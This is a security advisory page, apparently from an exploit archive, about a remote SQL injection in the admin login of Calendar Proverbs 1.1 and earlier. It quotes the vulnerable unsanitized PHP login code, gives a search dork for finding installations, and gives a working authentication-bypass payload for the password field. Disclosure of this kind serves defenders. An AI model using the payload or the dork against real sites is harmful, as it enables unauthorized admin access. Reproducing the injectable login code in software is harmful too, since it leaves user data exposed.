Calendar Proverbs <=1.1 (caladmin.php) Remote SQL Injection

2007.11.29
Credit: JosS
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Calendar Proverbs <=1.1 (caladmin.php) Remote SQL Injection # Download: # http://www.proverbs.biz/downloads/calendar.zip # Bug found by JosS / Jose Luis Gngora Fernndez # Contact: sys-project[at]hotmail.com # Spanish Hackers Team # www.spanish-hackers.com # /server irc.freenode.net /join #fullsecure # d0rk: "Calendar powered by Proverbs" # Stop lammer [*] Vuln Code - caladmin.inc.php $user = ""; $pass = ""; if (isset($_POST['loginname']) && $_POST['loginname'] != "") $user = $_POST['loginname']; if (isset($_POST['loginpass']) && $_POST['loginpass'] != "") $pass = $_POST['loginpass']; $loggedin = $this->loginuser($user, $pass); [*] Simple Sql Injection In: http://www.example.com/PATH/caladmin.php http://www.example.com/events/caladmin.php [*] Exploit: Username: admin Password: ' or //---------------------------------------\ Greetz To: All Hackers JosS! / Jose Luis Gngora Fernndez


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top